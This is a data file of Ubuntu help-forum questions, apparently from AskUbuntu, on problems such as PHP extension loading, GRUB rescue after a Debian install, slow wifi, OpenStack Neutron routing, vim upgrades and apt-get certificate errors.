440825	ca n't install phalcon extention on ubuntu	i 'm trying to install phalcon frameworks and i ca n't get this part done right add the extension to your php.ini : extension=phalcon.so finally , restart the webserver i 've changed my php.ini file located at /etc/php5/apache2/ restart the apache server but the extension is not added when i test it through < ? php print_r ( get_loaded_extensions ( ) ) ; ? > output array ( [ 0 ] = > core [ 1 ] = > date [ 2 ] = > ereg [ 3 ] = > libxml [ 4 ] = > openssl [ 5 ] = > pcre [ 6 ] = > zlib [ 7 ] = > bcmath [ 8 ] = > bz2 [ 9 ] = > calendar [ 10 ] = > ctype [ 11 ] = > dba [ 12 ] = > dom [ 13 ] = > hash [ 14 ] = > fileinfo [ 15 ] = > filter [ 16 ] = > ftp [ 17 ] = > gettext [ 18 ] = > spl [ 19 ] = > iconv [ 20 ] = > mbstring [ 21 ] = > session [ 22 ] = > posix [ 23 ] = > reflection [ 24 ] = > standard [ 25 ] = > shmop [ 26 ] = > simplexml [ 27 ] = > soap [ 28 ] = > sockets [ 29 ] = > phar [ 30 ] = > exif [ 31 ] = > sysvmsg [ 32 ] = > sysvsem [ 33 ] = > sysvshm [ 34 ] = > tokenizer [ 35 ] = > wddx [ 36 ] = > xml [ 37 ] = > xmlreader [ 38 ] = > xmlwriter [ 39 ] = > zip [ 40 ] = > apache2handler [ 41 ] = > pdo [ 42 ] = > curl [ 43 ] = > gd [ 44 ] = > imagick [ 45 ] = > imap [ 46 ] = > intl [ 47 ] = > json [ 48 ] = > mcrypt [ 49 ] = > memcache [ 50 ] = > ming [ 51 ] = > mysql [ 52 ] = > mysqli [ 53 ] = > pdo_mysql [ 54 ] = > pdo_sqlite [ 55 ] = > pspell [ 56 ] = > readline [ 57 ] = > recode [ 58 ] = > snmp [ 59 ] = > sqlite3 [ 60 ] = > tidy [ 61 ] = > xmlrpc [ 62 ] = > xsl [ 63 ] = > mhash [ 64 ] = > zend opcache ) phalcon extension is nowhere . i even tried this .
440830	how do i make a python program write directly to the command line ?	this is the code i have , i want it so that i can write to the command-line from the window after i press the `` send '' button . if i want to see my `` ifconfig '' in the terminal , the command gets writen in the window and is displayed in the command line . all i want is for the window is to write to the command line after it is sent . i do n't know if i should type \n and it will write a new line or if there is already a function for this built into pygtk . # ! /usr/bin/env python import pygtk pygtk.require ( '2.0 ' ) import gtk class base : def send ( self , widget ) : self.button.this_is_where_write_in_commandline def writecommand ( self , widget ) : self.textbox.get_text ( ) def __init__ ( self ) : self.window = gtk.window ( gtk.window_toplevel ) self.window = set_position ( gtk.win_pos_center ) self.window = set_size_request ( 600 , 600 ) self.window.set_title ( `` window '' ) self.button = gtk.button ( `` send '' ) self.button.connect ( `` clicked '' , self.send ) self.textbox = gtk.entry ( ) self.textbox.connect ( `` changed '' , self.writecommand ) self.box1 = gtk.vbox ( ) self.box1.pack_start ( self.button ) self.box1.pack_start ( self.textbox ) self.window.add ( self.box1 ) self.window.show_all ( ) base = base ( ) gtk.main ( )
440834	grub rescue mode - installed debian on usb , and original ubuntu 13.10 system does n't work anymore	ubuntu community ! i have been using ubuntu 13.10 for the past year or so , and everything was fine until i decided to try out debian . i attempted to install the standard version ( command line ) of debian on a spare usb , via first copying the live image file on to usb 1 , and booting from there . when i got into the graphical installer of debian , i went though the installation , and choose to install debian from usb 1 onto usb 2 . during the process , i was asked if i want to rewrite ( ? ) the boot record , and i was warned to only do so if there is only 1 operating system installed . i assumed it was talking about the boot partition on my usb , and there was only one os on that , which was debian . therefore , i innocently clicked yes , and went on . later on , the debian installation did not work , ( when i plugged in usb 2 and booted from it only the flashing underline symbol came up , and nothing else ) i decided to go back to my well used ubuntu system problem is , it does n't boot anymore . when i restart my computer with no usb or external boot media attached , rather than going to ubuntu 13.10 , it entered into grub rescue mode . grub loading . welcome to grub ! error : no such device : [ uuid ] entering rescue mode ... grub rescue > _ that is the screen i see now . i tried to list the commands by doing help , man , and ? , but they do n't seem to work my hypothesis of the situation is that the debian installation wrote on the boot record of my computer 's hard drive , and now it wo n't boot from any other disk except for my debian usb ( 'usb 2 ' ) which does n't work anyways . how can i fix my boot record ? currently the resources at my disposal are internet access , another computer running windows 7 , and a spare 7.9 gb usb that i can load a ubuntu rescue image ( ? ) on to if necessary . please help !
440837	lubuntu 13.10 flash video does n't display ( youtube )	i have an old pc 256mb ram and 1.6ghz processor which had win xp . it could play youtube videos with chrome ( ok it stucked a bit ) and i installed lubuntu 13.10 . i installed the flashplayer plugin but it ca n't show any flash video neither play a flash game . it just shows an empty space . i have flashplayer plugin active and updated . what can i do ?
440838	how to share folders that are on a partition on a secondary hard drive ?	here 's my situation . i have a desktop computer with 2 hard drives in it . hard drive 1 has windows installed on it and pretty much has nothing to do with this , i think . hard drive 2 has a partition with media files ( music , movies , etc . ) , and a partition that ubuntu is installed on . when running ubuntu , i can make folders on the media partition of hard drive 2 visible to other ubuntu computers on the network but when i try to access them from my laptop , which is also running ubuntu , i get prompted for a username and password , which ends in access denied when i enter my credentials . i hope some one can help me and i hope i 've been clear about by problem .
440839	how can i recover from a failed cloud server instalation ?	i have run into a situation . i recently tried in install ubuntu server for cloud ( ubuntu server 12.04.4 lts 32-bit version ) on an old desktop pc . i made the startup disk , and everything was going fine . everything went well until i had to choose the method that the server would use to connect to the internet , ethernet or wireless . i choose wireless and it then prompted me to enter the essid . i choose for it to scan for available networks , however , it still could not find my network . i knew it was n't my wireless because i was able to access it on my laptop during the entire process . i decided to cancel the installation because i did not have the wireless information on hand . i tried access my router through my laptop 's web browser but it could not connect for some reason , i 'm using ubuntu 12.04 on my laptop . so , frustrated , i cancelled the installation and exited everything and tried to get into the regular desktop . the bios would load normally . however , now it does not load windows xp . instead , i get a black screen with a blinking cursor in the to left corner . i 'll admit , i was foolish for attempting to do this without a windows xp recovery disk on hand . is there anyway to revert what i have done ? also , is there anyway to access my router through a web browser ? i have done this before in windows . yet , whenever i enter the gateway , it says `` unable to connect '' . any help would be greatly appreciated . thank you .
440840	full disk asymmetric encryption	wondering if there 's a protocol and open source program for full-disk , asymmetric encryption . something like , encrypting the keys into the start of the disk ( using aes/something stronger ) and then using those keys to access the disk .
440842	headphone jacks not detected or wroking 13.10	http : //www.alsa-project.org/db/ ? f=4e051f007974c745e6260a7022dc6b40770ebca5 hey guys , i am switching over from windows to ubuntu and so far it has gone flawlessly . just one problem though ... the headphone jacks on my laptop do not seem to be detected . i have already read up on various `` solutions '' but none seem to work . fyi i do not have pulseaudio , i only have whatever it is that was built into ubuntu 13.10 . a little bit mor information you may need : -dell alienware m14x r2 -i did a lspci in console and noticed this line : 01:00.1 audio device : nvidia corporation gk107 hdmi audio controller ( rev a1 ) ) that is not my sound card . my assumption is that it is assuming the hdmi port is my audio output device instead of my headphone jacks . any help would be greatly appreciated . thanks in advance .
440843	user gets logged off back to login menu	i have ubuntu 12.04 installed via alternate installer amd64 fresh with libreoffice and ncomputing vspace software installed . i facing a unique issue here which is little tricky to describe . whenever i check gmail from firefox/chrome , the user gets logged off the moment i move mouse pointer towards inbox/sent/draft folder on left side . if i keep checking emails it doesnt log off . but the moment pointer is moved towards left side of screen , it just kicks out . same issue on same machine with ubuntu 12.04 desktop version amd64 . syslog/xserver.errors files are not showing anything which can lead to why this is happening . checked with unity/unity2d same issue . yahoo mail/outlook.com work fine no issues . display drivers are showing unknown as of now . matrox g200e onboard is showing in lspci -vv | grep vga . server config : intel server board 1200s3vps , xeon cpu , 16gb ram , 120gbx2 ssd kingston . any help would be appreciated . thanks . new information : this doesnt happen in opera . plus if i use basic view of gmail , this behavior is not observed . so something related to javascript & firefox/chrome .
440846	slow wlan on ubuntu 12.04 lts	i installed ubuntu about 5 weeks ago and i really like it = ) . but i 'm suffering from an extremely slow wlan connection . it 's the same problem in different networks , and i do n't have the same problems on my dual-boot windows 8.1 or on different devices . i tried different things like sudo rmmod iwlwifi sudo modprobe iwlwifi 11n_disable=1 or sudo iwconfig wlan0 power off but nothing seamed to work . therefore i hope you can help me . here i 've got a few terminal outputs that may help you : cat /etc/lsb-release ; uname -a distrib_id=ubuntu distrib_release=12.04 distrib_codename=precise distrib_description= '' ubuntu 12.04.4 lts '' linux cyrillsubuntu 3.11.0-18-generic # 32~precise1-ubuntu smp thu feb 20 17:52:10 utc 2014 x86_64 x86_64 x86_64 gnu/linux lspci -nnk | grep -ia2 net 00:19.0 ethernet controller [ 0200 ] : intel corporation 82577lm gigabit network connection [ 8086:10ea ] ( rev 05 ) subsystem : hewlett-packard company device [ 103c:1521 ] kernel driver in use : e1000e 44:00.0 network controller [ 0280 ] : intel corporation centrino advanced-n 6200 [ 8086:4239 ] ( rev 35 ) subsystem : intel corporation centrino advanced-n 6200 2x2 agn [ 8086:1311 ] kernel driver in use : iwlwifi lsusb bus 001 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 001 device 003 : id 03f0:241d hewlett-packard gobi 2000 wireless modem ( qdl mode ) bus 001 device 004 : id 138a:0007 validity sensors , inc. vfs451 fingerprint reader bus 001 device 005 : id 04f2 : b15e chicony electronics co. , ltd bus 002 device 003 : id 046d : c52b logitech , inc. unifying receiver iwconfig eth0 no wireless extensions . lo no wireless extensions . wlan0 ieee 802.11abg essid : '' netgear '' mode : managed frequency:2.412 ghz access point : 20:4e:7f:7a:49 : ac bit rate=54 mb/s tx-power=15 dbm retry long limit:7 rts thr : off fragment thr : off power management : off link quality=70/70 signal level=-40 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:319 missed beacon:0 rfkill list all 0 : hp-wifi : wireless lan soft blocked : no hard blocked : no 1 : hp-bluetooth : bluetooth soft blocked : yes hard blocked : no 2 : hp-wwan : wireless wan soft blocked : no hard blocked : no 3 : phy0 : wireless lan soft blocked : no hard blocked : no lsmod module size used by ip6table_filter 12815 0 ip6_tables 27502 1 ip6table_filter iptable_filter 12810 0 ip_tables 27716 1 iptable_filter x_tables 34194 4 ip6table_filter , ip6_tables , iptable_filter , ip_tables bnep 24107 2 rfcomm 74718 0 bluetooth 391726 10 bnep , rfcomm binfmt_misc 17508 1 nvidia 10619255 41 snd_hda_codec_hdmi 41773 4 arc4 12573 2 snd_hda_codec_idt 55053 1 iwldvm 244387 0 snd_hda_intel 57134 5 mac80211 623607 1 iwldvm snd_hda_codec 194817 3 snd_hda_codec_hdmi , snd_hda_codec_idt , snd_hda_intel pata_pcmcia 17081 1 snd_hwdep 13613 1 snd_hda_codec snd_pcm 107140 3 snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec snd_seq_midi 13324 0 snd_rawmidi 30416 1 snd_seq_midi snd_seq_midi_event 14899 1 snd_seq_midi snd_seq 66061 2 snd_seq_midi , snd_seq_midi_event snd_timer 29989 2 snd_pcm , snd_seq uvcvideo 82247 0 r852 18241 0 sm_common 16860 1 r852 nand 64723 2 r852 , sm_common snd_seq_device 14497 3 snd_seq_midi , snd_rawmidi , snd_seq qcserial 13139 0 usb_wwan 20417 1 qcserial videobuf2_core 40815 1 uvcvideo mtd 59660 2 sm_common , nand videodev 138562 2 uvcvideo , videobuf2_core usbserial 44971 2 qcserial , usb_wwan videobuf2_vmalloc 13216 1 uvcvideo snd 73753 21 snd_hda_codec_hdmi , snd_hda_codec_idt , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_seq_midi , snd_rawmidi , snd_seq , snd_timer , snd_seq_device videobuf2_memops 13362 1 videobuf2_vmalloc nand_ids 8627 1 nand soundcore 12680 1 snd nand_bch 13227 1 nand r592 18148 0 joydev 17613 0 iwlwifi 179516 1 iwldvm bch 22063 1 nand_bch pcmcia 62188 1 pata_pcmcia hp_wmi 18202 0 memstick 16811 1 r592 hp_accel 26012 0 lis3lv02d 20280 1 hp_accel psmouse 104093 0 snd_page_alloc 18798 2 snd_hda_intel , snd_pcm sparse_keymap 13890 1 hp_wmi video 19574 0 input_polldev 13896 1 lis3lv02d mxm_wmi 13021 0 serio_raw 13413 0 mac_hid 13253 0 nand_ecc 13312 1 nand yenta_socket 45426 0 cfg80211 499466 3 iwldvm , mac80211 , iwlwifi drm 306660 2 nvidia pcmcia_rsrc 18591 1 yenta_socket pcmcia_core 23715 3 pcmcia , yenta_socket , pcmcia_rsrc mei_me 18418 0 tpm_infineon 17410 0 mei 78537 1 mei_me intel_ips 18520 0 wmi 19256 2 hp_wmi , mxm_wmi ppdev 17711 0 tpm_tis 19255 0 lpc_ich 21163 0 parport_pc 32866 1 lp 17799 0 parport 42466 3 ppdev , parport_pc , lp hid_logitech_dj 18767 0 usbhid 53329 0 hid 106315 2 hid_logitech_dj , usbhid firewire_ohci 45076 0 sdhci_pci 19072 0 sdhci 43292 1 sdhci_pci firewire_core 65168 1 firewire_ohci crc_itu_t 12707 1 firewire_core ahci 30063 3 libahci 32118 1 ahci e1000e 257955 0 ptp 18627 1 e1000e pps_core 19056 1 ptp nm-tool networkmanager tool state : connected ( global ) - device : wlan0 [ netgear ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : 802.11 wifi driver : iwlwifi state : connected default : yes hw address : 18:3d : a2:3b:2f:7c capabilities : speed : 54 mb/s wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points ( * = current ap ) 5440 5744 : infra , a4:52:6f:9e:0a:41 , freq 2462 mhz , rate 54 mb/s , strength 30 wpa wpa2 xzt-04934 : infra , 00:22:10 : a6:3c : c0 , freq 2437 mhz , rate 54 mb/s , strength 24 wpa wpa2 *netgear : infra , 20:4e:7f:7a:49 : ac , freq 2412 mhz , rate 54 mb/s , strength 78 wpa2 ipv4 settings : address : 10.0.0.14 prefix : 24 ( 255.255.255.0 ) gateway : 10.0.0.1 dns : 10.0.0.1 - device : eth0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : e1000e state : unavailable default : no hw address : b4:99 : ba : e4:34 : b0 capabilities : carrier detect : yes wired properties carrier : off thank you in advance ! cyrill_10
440855	weird invisible boundaries on secondary monitor	i 'm using ubuntu 13.10 with gnome 3.8.4 i have strange invisible boundaries or borders that i can not drag windows across on my secondary monitor with my dual monitor set up . also , program menus never get displayed on the secondary monitor - i have to drag the program to my primary monitor and then click on the menu to display them . i have had this problem ever since i installed ubuntu and gnome . i 'm a relative noob .. any help would be appreciated . my graphics card : gallium 0.4 on amd rs880 i have my secondary monitor stacked above my primary .
440857	how do you make it so all youtube videos play the worst quality by default on ubuntu ?	the goal here is to use as little bandwidth as possible .
440859	ubuntu kickstart/seed file - weak password	i have used the kickstart generator tool to generate a kickstart/preseed file for ubuntu kvm installations which has worked well until now . it stopped working when i switched over to using a very weak password , which results it halting on an additional option shown below : what do i need to add to the kickstart file in order to confirm that this is ok ? # initial user user ubuntu -- fullname `` '' -- password ubuntu
440867	install aircrack -ng and iwlwifi-2030-ucode-18.168.6.1 without internet connection	i want to install aircrack -ng and iwlwifi-2030-ucode-18.168.6.1 on ubuntu 13.10 64 bits without internet connection . tell me which packages & repositories ( universe etc . ) should i download from another pc .
440868	recording game audio with simplescreenrecorder	i 'm following the tutorial www.maartenbaert.be/simplescreenrecorder/recording-game-audio/ ( pulseaudio : the hard way ) to get simplescreenrecorder to record both the monitor of plantronics and plantronics . i entered the commands in the terminal and that worked fine . now in the pulseaudio volume control , i am unable to set the game ( java ) to the first null output . it also did n't work with the game supertux so it is n't just an issue with java . nothing happens when i click `` null output '' it still stays on plantronics like so . thanks in advance , ben
440869	upgrade vim/gvim on ubuntu 12.04	ubuntu 12.04 has vim 7.3.429 , which has an issue with match ( ) function , because of it i need to upgrade vim and gvim . i need for vim > = 7.3.829 & & < = 7.3.1268 , or > = 7.4.018 ( because of another issue ) i tried to look for ppas , but this one has 7.4.005 , which is buggy too ( see version requirements above ) , and this one , which seems fine , but after i 've done this : sudo apt-add-repository ppa : dgadomski/vim-daily sudo apt-get update sudo apt-get install vim it returns that vim is already newest version . ( my actual vim version is 7.3.429 ) . why is that ? i also tried to remove vim and install it again , but newly installed version is 7.3.429 again . then i tried to build it from source , so i 've cloned mercurial repo , configured and installed it : cd ~/projects hg clone https : //vim.googlecode.com/hg/ vim cd vim/src ./configure -- enable-rubyinterp=yes -- enable-pythoninterp=yes -- enable-gui=gtk2 -- with-x -- prefix=/opt/vim make sudo checkinstall -- pkgname=vim-my-latest so i have vim 7.4.227 in the /opt/vim/bin now , but there 's no gvim , and when i start vim and check has ( 'gui ' ) and has ( 'ruby ' ) , both of them return 0 . why is that ? i 've given -- enable-rubyinterp=yes and -- enable-gui=gtk2 -- with-x . have i missed something ?
440874	unable to boot ubuntu 13.10 with either dvd or usb error 8000	i am new to ubuntu and would love to try it , but the problem is that i am not able to install using dvd or usb . my computer is old : core2duo , 2gbram , 500gb hd , etc . when i try booting a windows os on a usb , i get that showing under the primary boot device but when i try the same with ubuntu it does n't . when i choose usb hd or usb zip , it just does n't make any difference in booting my win os ( 7 , downgraded from 8.1 pro to try ubuntu ) . meanwhile i tried booting the dvd it gives me a bunch of 8000 errors and boot config file not found ... so i downloaded another 13.10 from the website saucy download same thing.. in short i need help ! !
440875	openstack neutron outside communication through router does n't work , local between vms does	i am pretty lost with this one for few day now and ca n't move further . any ideas will be very welcome . my private net for vms : 10.5.5.0/24 outside link via 192.168.22.0/24 ( my router 's ip 192.168.22.1 ) neutron subnet-list + -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- + -- -- -- + -- -- -- -- -- -- -- -- -+ -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- + | id | name | cidr | allocation_pools | + -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- + -- -- -- + -- -- -- -- -- -- -- -- -+ -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- + | 7b77e45f-160f-4808-b710-f644045f8d19 | | 192.168.22.0/24 | { `` start '' : `` 192.168.22.130 '' , `` end '' : `` 192.168.22.135 '' } | | b783a811-98f3-4fbe-bd2d-2f7b1378a000 | | 10.5.5.0/24 | { `` start '' : `` 10.5.5.2 '' , `` end '' : `` 10.5.5.254 '' } | + -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- + -- -- -- + -- -- -- -- -- -- -- -- -+ -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- + neutron net-list + -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- + -- -- -- -- -+ -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- + | id | name | subnets | + -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- + -- -- -- -- -+ -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- + | 5a523463-77e6-410e-92e2-cb191418e3c5 | net1 | b783a811-98f3-4fbe-bd2d-2f7b1378a000 10.5.5.0/24 | | efaa5928-ddca-4dbc-88a0-80dd9a95e5b8 | ext_net | 7b77e45f-160f-4808-b710-f644045f8d19 192.168.22.0/24 | + -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- + -- -- -- -- -+ -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- + nova list + -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- + -- -- -- -- -- -- -- + -- -- -- -- + -- -- -- -- -- -- + -- -- -- -- -- -- -+ -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -+ | id | name | status | task state | power state | networks | + -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- + -- -- -- -- -- -- -- + -- -- -- -- + -- -- -- -- -- -- + -- -- -- -- -- -- -+ -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -+ | 6a84c26c-47c4-4b03-9bd1-fa3abd2c9ad3 | cirros test1 | active | none | running | net1=10.5.5.2 , 192.168.22.131 | + -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- + -- -- -- -- -- -- -- + -- -- -- -- + -- -- -- -- -- -- + -- -- -- -- -- -- -+ -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -+ neutron floatingip-list + -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- + -- -- -- -- -- -- -- -- -- + -- -- -- -- -- -- -- -- -- -- -+ -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- + | id | fixed_ip_address | floating_ip_address | port_id | + -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- + -- -- -- -- -- -- -- -- -- + -- -- -- -- -- -- -- -- -- -- -+ -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- + | 4fcaa953-4fac-4459-a27e-1c2349e8f3b4 | 10.5.5.2 | 192.168.22.131 | f0d72b97-a8fa-42f0-942f-83f623c83128 | + -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- + -- -- -- -- -- -- -- -- -- + -- -- -- -- -- -- -- -- -- -- -+ -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- + i can successfully ping between vms when there are multiple running in network 10.5.5.0/24 , but all the other communication inside or outside does n't work . ovs-vsctl show 5d243164-aa3f-4323-aa64-64239b7f3ba2 bridge br-int port `` qg-85228b4f-4c '' interface `` qg-85228b4f-4c '' type : internal port `` em1 '' interface `` em1 '' port `` qr-88abb9f7-6d '' interface `` qr-88abb9f7-6d '' type : internal port `` tap9f56fceb-45 '' interface `` tap9f56fceb-45 '' type : internal port br-int interface br-int type : internal bridge br-ex port `` em2 '' interface `` em2 '' port br-ex interface br-ex type : internal ovs_version : `` 1.10.2 '' ip netns list qdhcp-5a523463-77e6-410e-92e2-cb191418e3c5 qrouter-67268e5b-89bc-4c79-b698-ca3b57912371 ip netns exec qrouter-67268e5b-89bc-4c79-b698-ca3b57912371 ifconfig lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:130 errors:0 dropped:0 overruns:0 frame:0 tx packets:130 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:12241 ( 12.2 kb ) tx bytes:12241 ( 12.2 kb ) qg-85228b4f-4c link encap : ethernet hwaddr fa:16:3e : ea:3e : ff inet addr:192.168.22.130 bcast:192.168.22.255 mask:255.255.255.0 inet6 addr : fe80 : :f816:3eff : feea:3eff/64 scope : link up broadcast running mtu:1500 metric:1 rx packets:1338504 errors:0 dropped:1210 overruns:0 frame:0 tx packets:138 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:105453095 ( 105.4 mb ) tx bytes:15786 ( 15.7 kb ) qr-88abb9f7-6d link encap : ethernet hwaddr fa:16:3e:73 : b1 : ff inet addr:10.5.5.1 bcast:10.5.5.255 mask:255.255.255.0 inet6 addr : fe80 : :f816:3eff : fe73 : b1ff/64 scope : link up broadcast running mtu:1500 metric:1 rx packets:1338707 errors:0 dropped:1208 overruns:0 frame:0 tx packets:21 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:105590392 ( 105.5 mb ) tx bytes:1642 ( 1.6 kb ) /etc/nova/nova.conf content : [ default ] neutron_metadata_proxy_shared_secret = pass service_neutron_metadata_proxy = true network_api_class=nova.network.neutronv2.api.api neutron_url=htxp : //control:9696 neutron_auth_strategy=keystone neutron_admin_tenant_name=service neutron_admin_username=neutron neutron_admin_password=pass neutron_admin_auth_url=htxp : //control:35357/v2.0 linuxnet_interface_driver = nova.network.linux_net.linuxovsinterfacedriver firewall_driver=nova.virt.firewall.noopfirewalldriver dhcpbridge_flagfile=/etc/nova/nova.conf dhcpbridge=/usr/bin/nova-dhcpbridge logdir=/var/log/nova state_path=/var/lib/nova lock_path=/var/lock/nova force_dhcp_release=true iscsi_helper=tgtadm libvirt_use_virtio_for_bridges=true connection_type=libvirt root_helper=sudo nova-rootwrap /etc/nova/rootwrap.conf verbose=true ec2_private_dns_show_ip=true api_paste_config=/etc/nova/api-paste.ini volumes_path=/var/lib/nova/volumes enabled_apis=ec2 , osapi_compute , metadata my_ip=192.168.22.10 vncserver_listen=192.168.22.10 vncserver_proxyclient_address=192.168.22.10 auth_protocol = http auth_strategy=keystone rpc_backend = nova.rpc.impl_kombu rabbit_host = control rabbit_password = pass rabbit_port = 5672 rabbit_use_ssl=false rabbit_userid=guest [ database ] connection = mysql : //nova : pass @ control/nova [ keystone_authtoken ] auth_host = control auth_port = 35357 auth_protocol = http admin_tenant_name = service admin_user = nova admin_password = adminpass /etc/neutron/neutron.conf content : [ default ] rabbit_host = control rabbit_password = rabbit_port = 5672 rabbit_use_ssl=false rabbit_userid=guest state_path = /var/lib/neutron lock_path = $ state_path/lock core_plugin = neutron.plugins.openvswitch.ovs_neutron_plugin.ovsneutronpluginv2 api_paste_config = /etc/neutron/api-paste.ini auth_strategy = keystone fake_rabbit = false notification_driver = neutron.openstack.common.notifier.rpc_notifier neutron.services.loadbalancer.agent_scheduler.chancescheduler [ quotas ] [ agent ] root_helper = sudo /usr/bin/neutron-rootwrap /etc/neutron/rootwrap.conf [ keystone_authtoken ] auth_host = control admin_tenant_name = service admin_user = neutron admin_password = auth_port = 35357 auth_protocol = http auth_strategy = keystone signing_dir = $ state_path/keystone-signing rpc_backend = neutron.openstack.common.rpc.impl_kombu rabbit_host = control rabbit_port = 5672 rabbit_password = [ database ] connection = mysql : //neutron : @ control/neutron [ service_providers ] service_provider=loadbalancer : haproxy : neutron.services.loadbalancer.drivers.haproxy.plugin_driver.haproxyonhostplugindriver : default /etc/neutron/plugins/openvswitch/ovs_neutron_plugin.ini content : [ ovs ] tenant_network_type = vlan network_vlan_ranges = physnet1:1100:2999 bridge_mappings = physnet1 : br-int [ agent ] [ securitygroup ] neutron.agent.linux.iptables_firewall.ovshybridiptablesfirewalldriver firewall_driver = nova.virt.firewall.noopfirewalldriver any pointers into the right direction will be very appreciated , after pulling my hair because of this for last few days . if you guys need any other information , i will be happy to post . tia , matej
440877	qml listview display only 1 row ( if covered in column and row )	i need to put a listview ( coded in qml ) into a row , but in this case only first row of the listview is displayed . some idea why ? here is my example : import qtquick 2.0 import ubuntu.components 0.1 page { id : test column { spacing : units.gu ( 1 ) id : pagelayout anchors { margins : units.gu ( 2 ) fill : parent } row { id : listarea spacing : units.gu ( 1 ) listmodel { id : fruitmodel listelement { name : `` apple '' cost : 2.45 } listelement { name : `` orange '' cost : 3.25 } listelement { name : `` banana '' cost : 1.95 } } listview { anchors.fill : parent model : fruitmodel delegate : row { text { text : `` fruit : `` + name } text { text : `` cost : $ '' + cost } } } } } }
440878	how to report a shutdown bug	my kubuntu 13.10 system fails to shut down and hangs with the message `` stale nfs file handle. '' . my question , however , is not how to fix the problem ( though of course i 'd like to know that ) ; it 's how to report the problem as a bug . when i attempted to report the bug without specifying the package , i got a bot response that referred me to the article https : //wiki.ubuntu.com/bugs/findrightpackage , but there 's nothing in that article that applies to this situation . my attempted bug report is # 1299225 .
440883	can not access home folder	this has been happening recently after i got an internal error message about nautilus . since then whenever i try to access my home folder it stays on for 2 seconds and automatically closes . just after that my computer freezes up and i have to force restart the system . i have no idea what 's happening and i have n't found a suitable solution anywhere
440885	how do i run something from the installation directory ?	i 've successfully installed ubuntu 12.04.4 on my dell inspiron 1501 . i downloaded second life and have it in a folder in downloads . second life wiki says : the second life linux client entirely runs out of the directory you have unpacked it into - no installation step is required . run ./secondlife from the installation directory to start second life . how do i do this ?
440886	'unable to open uinput ' when using wminput with or without sudo	i 'm trying to get a wii classic controller paired to my chromebook running chrubuntu ( 12.04 ) . it works when using xwii , but although the buttons function , the analogue sticks do not . i wanted to try wminput/wiican , but in the case of the former , i run it in a terminal ( with or without sudo ) and it says `` unable to open uinput . '' when i try to use wiican it says `` please load uinput module first '' whether i try to open the program normally , or open in the terminal with sudo . one additional note : when i attempt `` sudo modprobe uinput '' i get the following error : fatal : could not read '/lib/modules/3.4.0/kernel/drivers/input/misc/uinput.ko ' : no such file or directory
440895	apt-get update error .	when i try to apt-get update , i got these errors : err https : //private-ppa.launchpad.net precise/main amd64 packages ssl : certificate subject name ( a248.e.akamai.net ) does not match target host name 'private-ppa.launchpad.net' err https : //private-ppa.launchpad.net precise/main i386 packages ssl : certificate subject name ( a248.e.akamai.net ) does not match target host name 'private-ppa.launchpad.net' w : failed to fetch https : //private-ppa.launchpad.net/commercial-ppa-uploaders/steam/ubuntu/dists/precise/main/binary-amd64/packages ssl : certificate subject name ( a248.e.akamai.net ) does not match target host name 'private-ppa.launchpad.net' w : failed to fetch https : //private-ppa.launchpad.net/commercial-ppa-uploaders/steam/ubuntu/dists/precise/main/binary-i386/packages ssl : certificate subject name ( a248.e.akamai.net ) does not match target host name 'private-ppa.launchpad.net' how to fix them ? appreciate if anyone could help me . thanks .
